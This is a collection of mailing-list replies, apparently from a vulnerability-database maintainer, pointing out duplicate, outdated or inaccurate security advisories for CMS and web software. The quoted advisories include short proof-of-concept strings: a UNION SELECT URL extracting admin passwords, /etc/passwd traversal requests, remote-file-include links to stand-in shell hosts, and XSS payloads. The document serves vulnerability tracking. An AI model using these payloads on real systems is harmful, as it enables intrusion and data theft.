: Real player resource exhaustion Vulnerability
: Real Networks Real Player is prone to Resource exhaustion vulnerability.
: When processing specially crafted HTML file, Real Player uses a value
: from the file to control a loop operation. Real player fails to validate
: the value before usin
On Thu, 20 Jan 2011, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22785
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_pixie.html
:
: Vulnerability Details:
: The vulnerability exists due to failure in the "/index.php" script to
properly sanitize user-supplied input in "ref
: Vulnerability ID: HTB22827
: Reference:
http://www.htbridge.ch/advisory/file_content_disclosure_in_wikipad.html
: Vulnerability Type: File Content Disclosure
: Risk level: Low
: Vulnerability Details:
: The vulnerability exists due to failure in the "/pages.php" script to
properly sanitize
: Vulnerability ID: HTB22776
: Reference:
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_diafan_cms.html
: Product: diafan.CMS
: Vulnerability Details:
: User can execute arbitrary JavaScript code within the vulnerable application.
:
: The vulnerability exists due to failure in the
: Vulnerability ID: HTB22770
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_phpmysport.html
: Vulnerability Details:
: The vulnerability exists due to failure in the "/index.php" script to
: properly sanitize user-supplied input in "v1" variable. Attacker can
: alter queries to
Not only was this previously discovered, you don't seem to understand the
variables:
On Thu, 30 Dec 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22754
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_lightneasy_1.html
: Product: LightNEasy
:
: Vulnerability Details:
:
Nice try.. republishing old findings again?
On Thu, 30 Dec 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22750
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_lightneasy.html
: Product: LightNEasy
: The vulnerability exists due to failure in the "/LightNEasy.php" script
Date: 2010-04-03
http://packetstorm.crazydog.pt/1004-exploits/wolfcms-xsrf.txt
This looks to be the same finding in 0.6.0a
On Thu, 25 Nov 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22681
: Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_wolf_cms.html
: Product: Wolf CMS
:
: Multiple vulnerabilities were found in web application chCounter <= 3.1.3.
:
: Author:
: - Matias Fontanini(mfontan...@cert.unlp.edu.ar).
:
: Requirements:
: - Downloads must be enabled(this is not default).
: - magic_quotes off.
: - Access to administration site
That is a lot of prerequisite
Seems to be a duplicate of:
http://www.exploit-db.com/exploits/9237/
CVE: 2009-3219 OSVDB-ID: 56336
From 2009-07-23
yes?
On Tue, 16 Nov 2010, eidelwe...@windowslive.com wrote:
:
: AWCM v2.2 Auth Bypass Vulnerabilities
: ###
: New eVuln Advisory:
: Cookie Auth Bypass in Hot Links SQL
: http://evuln.com/vulns/140/summary.html
Already discovered and disclosed:
http://www.exploit-db.com/exploits/8684/
Published: 2009-05-14
: ---[ Summary ]-
: eVuln ID: EV0140
: Software:
: Vulnerability ID: HTB22695
: Reference: http://www.htbridge.ch/advisory/xss_in_compactcms.html
: Product: CompactCMS
: Vendor: compactcms.nl ( http://www.compactcms.nl/ )
: Vulnerable Version: 1.4.1
: Vendor Notification: 04 November 2010
: Vulnerability Type: XSS (Cross Site Scripting)
: Sta
CVE-2008-1609 & CVE-2006-7128
same issue, 4.0 RC1 and RC2. really guys? at least check VDBs before you
publish.
: Vulnerability ID: HTB22666
: Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Did you check the vendor's page?
This page last updated on : May 20, 2006
: Vulnerability ID: HTB22618
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_expression_cms_1.html
: Product: Expression
: Vendor: Backbone Technology ( http://www.backbonetechnology.com )
: Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
How do you know
: Vulnerability ID: HTB22620
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_lantern_cms.html
: Product: Lantern CMS
: Vendor: Lantern ( http://www.lanterncms.com/www/html/7-home-page.asp )
: Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
From the vendo
ious actions.
Demonstrating a few of those vectors would be more helpful.
- security curmudgeon
it would really require
something like a CSRF.
Fortunately for attackers, it seems you guys missed the CSRF in this
application that HolisticInfoSec found:
http://holisticinfosec.org/content/view/154/45/
Keep up the solid research guys.
- security curmudgeon
: Vulnerability ID: HTB22564
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_auto_cms.html
: Product: Auto CMS
: Vendor: Roberto Aleman ( http://ventics.com/autocms/ )
: Vulnerable Version: 1.6 and Probably Prior Versions
: Vulnerability Type: XSS (Cross Site Scripting)
As an
: Vulnerability ID: HTB22584
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_compucms.html
: Product: CompuCMS
: Vendor: CompuSoft A/S ( http://www.compusoft.dk/ )
: Vulnerable Version: Current at 06.08.2010 and Probably Prior Versions
Once again, you assign a "version" based
: 1. OVERVIEW
:
: The QtWeb Browser application is vulnerable to Insecure DLL Hijacking
: Vulnerability. Similar terms that describe this vulnerability have been
: come up with Remote Binary Planting, and Insecure DLL
: Loading/Injection/Hijacking/Preloading.
: 3. VULNERABILITY DESCRIPTION
:
: Vulnerability ID: HTB22576
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_tcms_2.html
: Vulnerability ID: HTB22571
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_tcms.html
Aside switching from GET to a POST request, what is the differ
: Product: Eden Platform
: Vendor: Preation ( http://www.preation.com/ )
: Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions
: Risk level: Medium
The vendor web page has a free trial feature, with no obvious version.
Your version of 01.07.2010 appears to be something you de
: Vulnerability ID: HTB22489
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_theeta_cms_2.html
: Vendor: MN Tech Solutions
: Vulnerable Version: 0.0
: The vulnerability exists due to failure in the "forum.php" script to
: properly sanitize user-supplied input in "forum" variab
: Product: WebPress
: Vendor: YWP ( http://www.goywp.com/ )
: Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
The vendor web page has a demo feature, that is powered by "YWP 13.00.04".
Creating a demo via their site, the changelog shows "05.05.2010 - Released
version 13.0
: Vulnerability ID: HTB22445
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cruxcms.html
: Product: CruxCMS
: Vendor: CruxSoftware
: Vulnerable Version: 3.00 and Probably Prior Versions
: Risk level: Medium
: Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing
This was already disclosed on 2008-01-06 (CVE-2008-4612) in version 4.0.
On Tue, 29 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22442
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_portalapp_1.html
: Product: PortalApp
: Vendor: Latek
: Vulnerable Version: 4
Already discovered 2010-05-12 (CVE-2010-1994) by Secunia and possibly
Holistic. Original advisories:
http://secunia.com/secunia_research/2010-56
http://holisticinfosec.org/content/view/141/45/
On Tue, 29 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22444
: Reference:
http://
Hello,
For both of your WebDB advisories, you say:
: Product: WebDB
: Vendor: Lois Software
: Vulnerable Version: 2.0a and Probably Prior Versions
: Status: Fixed by Vendor
: Risk level: High
: Solution: There is no need for anybody to upgrade to the latest version.
Why is there no need for
On Sat, 12 Jun 2010, i...@securitylab.ir wrote:
: #
: # Securitylab.ir
: #
: # Application Info:
: # Name: Cherokee Web Server
: # Version: 0.5.3
: # Download:
Discovered 2008-01-21, covered by CVE-2008-0422 / OSVDB 40960.
On Sat, 5 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22398
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_boastmachine.html
: Product: boastMachine
: Vendor: Kailash Nadh
: Vulnerable V
Seriously?
This was reported in Jul 2001 by Hiromitsu Takagi, and assigned
CVE-2001-1161.
http://seclists.org/bugtraq/2001/Jul/22
Would you please:
a) check to see if a vulnerability has been published
b) test current software
c) include the full name of the product you are testing
"IBM Lotu
: Title: Elkapax CMS Multiple Vulnerabilities
:
: Vendor: www.elkapax.com
: Fix: N/A
: Elkapax is a CMS producer in Iran. Search page in Elkapax CMS
:
: product are vulnerable to XSS vulnerability.
:
: Cross Site Scripting vulnerability in Search page in "q" parameter.
:
: http://example.co
On Mon, 13 Apr 2009, mariani...@hotmail.com wrote:
: Discovered by Sirdarckcat from elhacker.net
By 'discovered', you mean 'copied from the disclosure in September 2006'
right?
CVE-2006-4605 through CVE-2006-4608.
: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART
: Risk Level: High
: Oracle Database Server provides the SYS.OLAPIMPL_T package. This package
: contains the procedure ODCITABLESTART which is vulnerable to buffer
: overflow attacks. Impact: By default SYS.OLAPIMPL_T has EXEC
On Fri, 15 Aug 2008, r3d.w...@yahoo.com wrote:
(pardon the late reply)
: #!user/bin/python
: # -*- coding: cp1256 -*-
:
#
: munky-bliki Lfi
: ZDI-09-007: Apple QuickTime Cinepak Codec MDAT Heap Corruption
: Vulnerability
: http://www.zerodayinitiative.com/advisories/ZDI-09-007
: January 21, 2009
:
: -- CVE ID:
: CVE-2009-2006
CVE-2009-0006 perhaps?
(Note the date, late reply I know..)
On Tue, 29 Jul 2008, Andy Davis wrote:
: The IOS FTP server vulnerabilities were published in an advisory by
: Cisco in May 2007. The FTP server does not run by default, it is not
: widely used and has since been removed from new versions of IOS.
: Therefo
iDefense, CVE or Oracle;
The two iDefense advisories present a bit of confusion over the CVE
assignments and number of vulnerabilities. There appear to be two
vulnerabilities (login.php and common.php) that may have 3 CVE numbers
assigned. Could anyone clarify?
First advisory, mail list post
Hello Assurent & Oracle,
On Tue, 13 Jan 2009, vr-subscription-nore...@assurent.com wrote:
: Oracle BEA WebLogic Server Apache Connector Buffer Overflow
:
: Reference: http://www.bea.com/weblogic/server/
:
: 2. Vulnerability Summary
:
: A remotely exploitable vulnerability has been discovered
sly than Oracle's.
Any input from either side to help clarify?
- security curmudgeon
p.s. Same exact question and CVSS2 scores for SYS.DBMS_AQJMS_INTERNAL
(DB15), CVE-2008-1821, same Oracle CPU.
On Sat, 20 Dec 2008, ad...@bugreport.ir wrote:
: +-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q"
: parameter.
:
: POC:
:
http://[URL]/chicomas/index.php?q=";alert(/www.BugReport.ir/.source)
This was disclosed on May 5th [1] by Hadi Kiamarsi and was assigned BID
2902
: Have you ever nmap-ed a network with AS/400s? If you have, you probably
: know that doing so will, in at least half the cases, either crash the
: box, hang up one or more services, or really confuse the IP stack to the
: point that the box almost screeches to a halt.
This is frequently obse
: # Phorm v3.0 Remote File Upload Vulnerability
:
: # ilker kandemir
:
:
: # Exploit: http://[site]/[phorm_path]/lib/fileupload.php [+]=>>
upload your shell.php
:
: # http://[site]/[phorm_path]/files/phpshell.php
This also won't work unless an administrator makes changes to
: BellaBiblio Admin Login Bypass
:
: SCRIPT: BellaBiblio
:
: DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip
:
: AUTHOR: ilker kandemir
:
: Bug in;(admin.php)
: if (isset($_COOKIE['bellabiblio'])) {
: if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
:
: Olmek Var$a Kaderde Dert Ekleme Derdine Team :)
: Portal:Friend Script 2.5 - 2.4 Remote File İnclude Vulnerable
: Author:Yollubunlar
: http://yollubunlar.Org
:
: Exploit:script_path/inc/tell_a_friend.inc.php?script_root=Sh3ll.txt?
This was discovered on 2005-03-07 and reported for version 2.7
: MEFISTO PreSents...
.. something already disclosed before!
: Script: RIG Image Gallery
: Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367
:
: Contact: ilker Kandemir
:
: Exploit: check_entry.php?dir_abs_src=http://attacker.php?
2006-06-20
http://cve.mitre.org/c
: Discovery by:- Sw33t h4cK3r
:
: POWERED BY: SaphpLesson2.0
: --
:
: Exploit :
: http://Example.com/show/show.php?lessid=[SQL]
Discovered 2006-05-27
http://archives.neohapsis.com/archives/bugtraq/2006-05/0610.html
: Discovery by :- Sw33t h4cK3r
: powered by : saphp
:
:
: Exploit :
: http://Example.com/story/showcat.php?forumid=[SQL]
Discovered 2005-10-24
http://archives.neohapsis.com/archives/bugtraq/2005-10/0275.html
Discovered 2006-04-12
http://archives.neohapsis.com/archiv
: VENDOR :http://nucleuscms.org/
: BY : s3rv3r_hack3r (hackerz.ir admin)
: bug:
: nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS .
'PLUGINADMIN.php');
: Exploit:
: http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
I haven't examined the source cod
: We frequently see requests for contact on this mailing list. Readers
: are encouraged to ensure that their software vendors are aware of the
: following documents, which have more specific guidelines for vendors to
: establish. Because these documents have been co-authored by major
: organ
: ##
: # Fusion Polls (xtrphome) Remote File Inclusion
: ##
Is this Fusion Polls:
Fusion Poll 1.1
http://www.fusionphp.net/
http://www.ezgoal.com/channels/developer/f.asp?f=319691
Fusion Poll
On Tue, 13 Jun 2006, [EMAIL PROTECTED] wrote:
:
http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
:
: credits: EntriKa & The_BeKiR & erne
Which "Ashop" is this?
AShop Software
www.ashopsoftware.com/
Ashop Sho
: --
: found by: BoNy-m
: Site: http://www.alshmokh.com
: E-mail: [EMAIL PROTECTED]
: --
:
: Search:
: allinurl:tseekdir.cgi
:
: example:
: /tseekdir.cgi?location=/etc/passwd%00
: /tseekdir.cgi?id=1055&location=/etc/passwd%00
: /tsee
:
: By: Mr-X
: Email: [EMAIL PROTECTED]
: Subject: modules name(Sections)SQL Injection
:
:
: example:-
: /modules.php?name=Surveys&op=results&pollID=8&mode=&order=&thold=[SQL]
What product is this in? Searching for "modules name sections" is not that
h
: Discovered by: Qex
: Date: 25 April 2006
:
: /member.php?action=viewpro&member=[XSS]
Can you confirm this? Doing a quick grep of the 1.0.2 source code finds no
occurrence of "viewpro" at all. The line above also happens to be exactly
the same as your DevBB disclosure, suggesting this may be
: http://www.activecampaign.com/support/
:
: Version : 1-2-All KB
:* KnowledgeBuilder KB
:* iSalient KB
:* SupportTrio KB
:* visualEdit KB
:* General KB
:
: This is a support-faq script. The questions is asked. But this a script
: hi
-- Forwarded message --
From: Rick Elnor
To: [EMAIL PROTECTED]
Date: Sun, 29 Jan 2006 10:11:08 -0800
Subject: [OSVDB Mods] [Change Request] 22693: Etomite todo.inc.php cij Variable
Arbitrary Command Execution
Hello,
I am Rick Elnor, the Etomite CMS security expert and owner
> Quick clarification on several points based on emails that I've received:
>
> 1) We did notify Apache before going public. ISS X-Force emailed
> Apache in the morning at 9:44am regarding this Advisory. We waited until
> the afternoon before sending to Bugtraq for approval and finally r